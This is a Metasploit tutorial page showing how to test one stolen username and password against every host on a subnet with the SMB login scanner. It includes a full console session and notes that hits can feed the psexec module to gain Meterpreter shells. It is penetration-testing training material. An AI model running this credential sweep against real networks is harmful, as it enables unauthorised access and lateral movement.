Close
Notification:  
Professional
Login
Loading

SMB Login Check

A common situation to find yourself in is being in possession of a valid username and password combination, and wondering where else you can use it. This is where the SMB Login Check Scanner can be very useful, as it will connect to a range of hosts and determine if the username/password combination can access the target.

Keep in mind, this is very "loud" as it will show up as a failed login attempt in the event logs of every Windows box it touches. Be thoughtful on the network you are taking this action on. Any successful results can be plugged into the windows/smb/psexec exploit module (exactly like the standalone tool) which can be utilized to create Meterpreter sessions.

msf > use auxiliary/scanner/smb/login
msf auxiliary(login) >
show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        SMB Domain
   SMBPass                     no        SMB Password
   SMBUser    Administrator    no        SMB Username
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(login) >
set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(login) >
set SMBUser victim
SMBUser => victim
msf auxiliary(login) >
set SMBPass s3cr3t
SMBPass => s3cr3t
msf auxiliary(login) >
set THREADS 50
THREADS => 50
msf auxiliary(login) >
run

[*] 192.168.1.100 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.111 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.114 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.125 - FAILED 0xc000006d - STATUS_LOGON_FAILURE
[*] 192.168.1.116 - SUCCESSFUL LOGIN (Unix)
[*] Auxiliary module execution completed
msf auxiliary(login) >


 

© Offensive Security 2009